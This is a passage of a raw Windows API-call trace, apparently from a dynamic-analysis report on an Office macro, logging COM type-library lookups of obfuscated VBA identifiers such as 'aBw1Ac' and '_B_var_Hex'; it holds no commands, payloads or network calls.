out: lpWideCharStr="aBw1Ac") returned 7 [0069.115] ITypeComp:RemoteBind (in: This=0x665bd30, szName="aBw1Ac", lHashVal=0x10ca21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.115] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="aBw1Ac") returned 0x10ca21 [0069.115] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="aBw1Ac" | out: _Dst="aBw1Ac") returned 0x0 [0069.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="aBw1Ac") returned 7 [0069.115] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.115] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="aBw1Ac", lHashVal=0x10ca21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.115] IUnknown:Release (This=0x665ba50) returned 0xd [0069.115] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.115] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="aBw1Ac", lHashVal=0x10ca21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.115] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.115] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.115] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="aBw1Ac", lHashVal=0x10ca21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.116] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.116] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.116] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="aBw1Ac", lHashVal=0x10ca21, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.116] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a6256e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="aBw1Ac") returned 7 [0069.116] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="aBw1Ac", lHashVal=0x10ca21, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.116] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.116] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a6256e | out: _Dst=0x67c2d40) returned 0x0 [0069.116] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_aBw1Ac") returned 0x10448b [0069.116] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_aBw1Ac" | out: _Dst="_B_var_aBw1Ac") returned 0x0 [0069.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_aBw1Ac") returned 14 [0069.116] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.116] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_aBw1Ac", lHashVal=0x10448b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.116] IUnknown:Release (This=0x665ba50) returned 0xd [0069.116] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.116] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_aBw1Ac", lHashVal=0x10448b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.116] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.116] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.116] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_aBw1Ac", lHashVal=0x10448b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.116] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.116] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.116] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_aBw1Ac", lHashVal=0x10448b, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.116] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.116] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.116] IUnknown:Release (This=0x665ba50) returned 0xd [0069.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1127e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_aBw1Ac") returned 14 [0069.116] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_aBw1Ac", lHashVal=0x10448b, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x61005f00720061, ppTypeComp=0x41003100000000, pDummy=0x0) returned 0x0 [0069.117] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a6256e | out: _Dst=0x144ec0) returned 0x0 [0069.117] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0069.117] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0069.117] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.117] IUnknown:Release (This=0x665ba50) returned 0xd [0069.117] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.117] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.117] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.117] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.117] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.117] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.117] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.117] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.117] IUnknown:Release (This=0x665ba50) returned 0xd [0069.117] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.117] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.117] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.117] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.117] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.117] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.118] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.118] IUnknown:Release (This=0x665ba50) returned 0xd [0069.118] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.118] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.118] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.118] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.118] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.118] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.118] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.118] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.118] IUnknown:Release (This=0x665ba50) returned 0xd [0069.118] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.118] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.118] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.118] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0069.118] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0069.118] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0069.118] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.118] IUnknown:Release (This=0x665ba50) returned 0xd [0069.118] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.118] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.118] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.118] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.119] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.119] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.119] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.119] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.119] IUnknown:Release (This=0x665ba50) returned 0xd [0069.119] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.119] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.119] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.119] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.119] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.119] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.119] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.119] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.119] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.119] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.119] IUnknown:Release (This=0x665ba50) returned 0xd [0069.119] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.119] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.119] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.120] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.120] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.120] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.120] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.120] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.120] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.120] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.120] IUnknown:Release (This=0x665ba50) returned 0xd [0069.120] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.120] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.120] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624ce, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jBBDAw") returned 7 [0069.120] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jBBDAw", lHashVal=0x108a63, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624ce, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jBBDAw") returned 7 [0069.120] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jBBDAw", lHashVal=0x108a63, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.120] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624ce, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jBBDAw") returned 7 [0069.120] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jBBDAw", lHashVal=0x108a63, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.120] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jBBDAw") returned 0x108a63 [0069.121] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="jBBDAw" | out: _Dst="jBBDAw") returned 0x0 [0069.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="jBBDAw") returned 7 [0069.121] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.121] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jBBDAw", lHashVal=0x108a63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.121] IUnknown:Release (This=0x665ba50) returned 0xd [0069.121] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.121] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jBBDAw", lHashVal=0x108a63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.121] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.121] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.121] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jBBDAw", lHashVal=0x108a63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.121] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.121] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.121] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jBBDAw", lHashVal=0x108a63, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.121] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a624ce, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jBBDAw") returned 7 [0069.121] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jBBDAw", lHashVal=0x108a63, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.121] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.121] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3a624ce | out: _Dst=0x67c2d40) returned 0x0 [0069.121] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jBBDAw") returned 0x1004cd [0069.121] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_jBBDAw" | out: _Dst="_B_var_jBBDAw") returned 0x0 [0069.121] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_jBBDAw") returned 14 [0069.121] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.121] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jBBDAw", lHashVal=0x1004cd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.121] IUnknown:Release (This=0x665ba50) returned 0xd [0069.121] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.121] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jBBDAw", lHashVal=0x1004cd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.121] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.122] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.122] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jBBDAw", lHashVal=0x1004cd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.122] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.122] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.122] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jBBDAw", lHashVal=0x1004cd, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.122] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.122] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.122] IUnknown:Release (This=0x665ba50) returned 0xd [0069.122] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b112ae, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_jBBDAw") returned 14 [0069.122] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jBBDAw", lHashVal=0x1004cd, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41004400000000, pDummy=0x0) returned 0x0 [0069.122] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3a624ce | out: 